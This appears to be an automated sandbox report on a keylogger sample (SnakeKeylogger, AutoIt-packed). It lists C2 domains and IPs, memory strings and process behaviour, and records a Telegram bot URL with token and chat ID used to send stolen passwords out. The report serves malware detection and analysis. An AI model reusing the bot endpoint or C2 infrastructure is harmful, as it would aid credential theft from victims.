Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: POST /illjjcn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /dawajiqtqrkbbpd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /xifbrctmnvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /kmpia HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /brsjohajbqj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /yjxln HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: GET /yjxln?usid=27&utid=10450772446 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: POST /sbjeah HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: GET /sbjeah?usid=27&utid=10450772717 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: POST /ebncgq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /wmfptllh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /xuri HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /jnemakkqdmxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /bcwwcxayhua HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /rgnicitetktmnuug HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850

Source: unknown

HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49706 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET /yjxln?usid=27&utid=10450772446 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: GET /sbjeah?usid=27&utid=10450772717 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz

Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic	DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic	DNS traffic detected: DNS query: przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: ww12.przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: zlenh.biz
Source: global traffic	DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic	DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic	DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic	DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic	DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic	DNS traffic detected: DNS query: xlfhhhm.biz

Source: unknown

HTTP traffic detected: POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318d2fbe638dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: officesvcmgr.exe.2.dr	String found in binary or memory: http://127.0.0.1:13556/HttpLogWriterEndpointInsiderSlabBehaviorInsiderSlabBehaviorReportedStateInsid
Source: armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1841325867.000000000092E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1841325867.0000000000937000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2059203379.000000000092F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/
Source: armsvc.exe, 00000002.00000003.1841325867.0000000000937000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1841325867.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/dawajiqtqrkbbpd
Source: armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1817901404.0000000000937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/
Source: armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/f
Source: armsvc.exe, 00000002.00000003.1817901404.0000000000947000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/illjjcn
Source: armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/t
Source: armsvc.exe, 00000002.00000003.2059203379.0000000000937000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/xifbrctmnvq
Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002674000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002601000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000011.00000002.2869998704.00000000026A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: AppVClient.exe, 00000007.00000002.1596296692.0000000000554000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1595419974.000000000053C000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1595705403.0000000000544000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1595229479.0000000000535000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micrXX
Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002601000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: armsvc.exe, armsvc.exe, 00000002.00000003.2117513572.0000000000969000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2117900022.0000000002340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODVmZjVk
Source: armsvc.exe, 00000002.00000003.2123658991.0000000002330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzgxODYwMDA0
Source: armsvc.exe, 00000002.00000003.2369732741.000000000095B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz/sbjeah?usid=27&utid=10450772717
Source: officesvcmgr.exe.2.dr	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: officesvcmgr.exe.2.dr	String found in binary or memory: http://www.openssl.org/support/faq.htmlerror
Source: armsvc.exe, 00000002.00000003.1934226332.0000000002000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: OcPubMgr.exe.2.dr	String found in binary or memory: http://xml.org/sax/properties/lexical-handlerhttp://xml.org/sax/features/namespace-prefixeshttp://xm
Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002763000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613
Source: armsvc.exe, 00000002.00000003.2475920628.00000000007B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: officesvcmgr.exe.2.dr	String found in binary or memory: https://clients.config.office.net/manage/v1.0/serviceabilitymanager/MsaDeviceTokenMsaLastUpdatedMsaE
Source: armsvc.exe, 00000002.00000003.1999655584.0000000002000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxFailed
Source: armsvc.exe, 00000002.00000003.2000679168.0000000002000000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2000959495.0000000002000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
Source: armsvc.exe, 00000002.00000003.2476007253.00000000007B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: armsvc.exe, 00000002.00000003.2116959373.0000000002010000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2117900022.0000000002340000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2122593748.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2123658991.0000000002330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://euob.netgreencolumn.com/sxp/i/c4601e5f6cdd73216cafdd5af209201c.js
Source: msedge_proxy.exe.2.dr	String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
Source: msedge_proxy.exe.2.dr	String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
Source: armsvc.exe, 00000002.00000003.2476088254.00000000007B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: armsvc.exe, 00000002.00000003.2476088254.00000000007B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
Source: armsvc.exe, 00000002.00000003.2475652692.00000000007B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: officesvcmgr.exe.2.dr	String found in binary or memory: https://nexusrules.officeapps.live.comhttps://nexus.officeapps.live.com/nexus/upload//nexus/rulesX-M
Source: officesvcmgr.exe.2.dr	String found in binary or memory: https://otelrules.azureedge.net/rules/UniversaliOSFailed
Source: armsvc.exe, 00000002.00000003.2116959373.0000000002010000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2117900022.0000000002340000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2122593748.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2123658991.0000000002330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
Source: armsvc.exe, 00000002.00000003.2117900022.0000000002340000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2123658991.0000000002330000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pcnatrk.net/track.
Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000011.00000002.2869998704.0000000002680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49711 version: TLS 1.2

Source: officesvcmgr.exe.2.dr

Binary or memory string: RegisterRawInputDevices

memstr_11577596-1

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000011.00000002.2836403260.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 4068, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: SABXJ1B5c8.exe, 00000000.00000000.1558309915.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_e7ef9cb3-1
Source: SABXJ1B5c8.exe, 00000000.00000000.1558309915.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_69d41808-f
Source: SABXJ1B5c8.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_2cd697e9-4
Source: SABXJ1B5c8.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_f5dc74ca-6

Source: C:\Windows\SysWOW64\perfhost.exe

Code function: 14_2_00858140 SetFilePointerEx,_strlen,_strlen,_strlen,CloseHandle,OpenProcessToken,GetCurrentProcess,GetTokenInformation,GetLastError,WriteFile,ReadFile,SetFilePointerEx,GetEnvironmentVariableW,_wcslen,GetTempPathW,wsprintfW,GetTickCount,GetFileSizeEx,CloseHandle,GetTickCount,RtlAdjustPrivilege,NtQuerySystemInformation,RtlInitUnicodeString,RtlEqualUnicodeString,NtOpenThread,NtImpersonateThread,NtOpenThreadTokenEx,NtAdjustPrivilegesToken,NtClose,NtClose,RtlExitUserThread,

14_2_00858140

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\ec81b4f2d7d67082.bin			Jump to behavior
Source: C:\Windows\System32\wbengine.exe	File created: C:\Windows\Logs\WindowsBackup

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 2_3_022262F0	2_3_022262F0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 2_3_02220140	2_3_02220140
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 2_3_02248140	2_3_02248140
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 2_3_022471AC	2_3_022471AC
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 2_3_02225800	2_3_02225800
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 2_3_0223D98C	2_3_0223D98C
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 2_3_02224D80	2_3_02224D80
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 2_3_020035D0	2_3_020035D0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 2_3_020035D0	2_3_020035D0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 2_3_020035D0	2_3_020035D0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 2_3_020035D0	2_3_020035D0
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_00BD2ED0	7_2_00BD2ED0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 10_2_009C2ED0	10_2_009C2ED0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 11_2_00D02ED0	11_2_00D02ED0
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Code function: 13_2_00BF2ED0	13_2_00BF2ED0
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140	14_2_00858140
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_0088F080	14_2_0088F080
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_008562E0	14_2_008562E0
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00860A10	14_2_00860A10
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_0088CB10	14_2_0088CB10
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_0085A350	14_2_0085A350
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00860B70	14_2_00860B70
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_0088BD80	14_2_0088BD80
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00882D10	14_2_00882D10
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00857E70	14_2_00857E70
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00884F10	14_2_00884F10
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00892F33	14_2_00892F33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_02424348	17_2_02424348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_02429048	17_2_02429048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_02421A50	17_2_02421A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_02425978	17_2_02425978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_02422DD1	17_2_02422DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0638C7B0	17_2_0638C7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_06384340	17_2_06384340
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Code function: 19_2_00D92ED0	19_2_00D92ED0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Jump to behavior

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: String function: 020066E8 appears 36 times
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: String function: 022331BC appears 83 times
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: String function: 025EA950 appears 195 times
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: String function: 02003960 appears 32 times

Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe.2.dr	Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe.2.dr	Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
